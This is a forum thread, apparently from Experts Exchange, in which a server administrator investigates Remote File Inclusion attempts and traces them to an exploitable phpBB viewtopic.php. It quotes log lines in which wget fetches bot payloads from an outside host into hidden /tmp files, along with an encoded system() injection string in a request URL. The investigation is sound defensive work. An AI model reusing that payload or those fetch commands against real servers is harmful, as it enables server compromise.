gerrybakker
asked on
How do I find a script being used to as a "Remote File Inclusion" exploit on my server?
How do I find a script being used to as a "Remote File Inclusion" exploit on my server? Every few seconds the error log shows an entry like this.
--16:19:54-- http://mobile-portal.info/myfiles/expl/linuxday.txt
(try:13) => `/tmp/.girl'
Connecting to mobile-portal.info[88.212. 221.4]:80. .. --16:19:56-- http://mobile-portal.info/myfiles/expl/linuxdaybot.txt
(try:14) => `/tmp/.girl2'
Connecting to mobile-portal.info[88.212. 221.4]:80. .. --16:20:04-- http://mobile-portal.info/myfiles/expl/linuxdaybot.txt
(try:13) => `/tmp/.girl2'
Connecting to mobile-portal.info[88.212. 221.4]:80. .. failed: Connection timed out.
Retrying.
failed: Connection timed out.
Obviously my firewall is preventing it from completing its IRC planting mission - which is great - so nothing is actually getting dropped into my /tmp folder while the firewall is up and running but many bots out there are automatically trying my defenses all day and they are all using the same script on my server to access my server but I can't find a trace of what they are using to access it. Either the script is an innocent and exploitable script that belongs to a regular product like a forum or it was planted there by a malicious user.
I have successfully used netstat and grep to determine the IPs of many of the machines that are trying to get in and I have added those IPs to my iptables to stop them but new ones keep showing up so something exploitable is sitting on my server. I have a 1000 websites on this server so I can't just say - "oh its my forum script that needs upgrading" - I need to figure out how to search for a log record somewhere that would have the actual event and file location of the exploit.
I've asked a number of my super Linux tech friends and have come up empty handed so far.
Any ideas? I've been scratching my head for 4 days trying to come up with inventive ways to find the culprit.
--16:19:54-- http://mobile-portal.info/myfiles/expl/linuxday.txt
(try:13) => `/tmp/.girl'
Connecting to mobile-portal.info[88.212.
(try:14) => `/tmp/.girl2'
Connecting to mobile-portal.info[88.212.
(try:13) => `/tmp/.girl2'
Connecting to mobile-portal.info[88.212.
Retrying.
failed: Connection timed out.
Obviously my firewall is preventing it from completing its IRC planting mission - which is great - so nothing is actually getting dropped into my /tmp folder while the firewall is up and running but many bots out there are automatically trying my defenses all day and they are all using the same script on my server to access my server but I can't find a trace of what they are using to access it. Either the script is an innocent and exploitable script that belongs to a regular product like a forum or it was planted there by a malicious user.
I have successfully used netstat and grep to determine the IPs of many of the machines that are trying to get in and I have added those IPs to my iptables to stop them but new ones keep showing up so something exploitable is sitting on my server. I have a 1000 websites on this server so I can't just say - "oh its my forum script that needs upgrading" - I need to figure out how to search for a log record somewhere that would have the actual event and file location of the exploit.
I've asked a number of my super Linux tech friends and have come up empty handed so far.
Any ideas? I've been scratching my head for 4 days trying to come up with inventive ways to find the culprit.
ASKER
m1tk4 thanks for the forehead slapping obvious answer - "check the 1000 apache logs". It was staring me in the face but I couldn't see the trees for the forest. It was just too obvious.
After identifying the IP addresses I then did a grep for those IP addresses in the /var/log/httpd/domains folder to find the scripts that were being used.
grep -n -r -I "221.169.150.160" *
The results showed extended character codes in the string to hide the real string. you would never know or find the text string " http://mobile-portal.info/myfiles/expl/linuxdaybot.txt" in this result but it didn't matter because it was definitely the IP address that was running the wget session. Mystery solved.
sample line found in the log with the correct IP address.
mwarriors.com.log:242:221. 169.150.16 0 - - [01/May/2006:08:57:24 -0700] "GET /phpBB2/viewtopic.php?p=19 4&highligh t=%2527%25 2Esystem(c hr(112)%25 2Echr(101) %252Echr(1 14)%252Ech r(108)%252 Echr(32)%2 52Echr(45) %252Echr(1 01)%252Ech r(32)%252E chr(34)%25 2Echr(112) %252Echr(1 14)%252Ech r(105)%252 Echr(110)% 252Echr(11 6)%252Echr (32)%252Ec hr(113)%25 2Echr(40)% 252Echr(10 6)%252Echr (83)%252Ec hr(86)%252 Echr(111)% 252Echr(11 9)%252Echr (77)%252Ec hr(115)%25 2Echr(100) %252Echr(4 1)%252Echr (34))%252E %2527 HTTP/1.0" 200 23026 "-" "Mozilla/4.0"
After identifying the IP addresses I then did a grep for those IP addresses in the /var/log/httpd/domains folder to find the scripts that were being used.
grep -n -r -I "221.169.150.160" *
The results showed extended character codes in the string to hide the real string. you would never know or find the text string " http://mobile-portal.info/myfiles/expl/linuxdaybot.txt" in this result but it didn't matter because it was definitely the IP address that was running the wget session. Mystery solved.
sample line found in the log with the correct IP address.
mwarriors.com.log:242:221.
ASKER
Apparently - in this case it was the viewtopic.php file in phpBB that was being exploited.
>>it was the viewtopic.php file in phpBB
exactly.
exactly.
And why would it be a refund? I certainly object.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Also, it's not clear WHAT error log shows this - is this your apache error log or something else?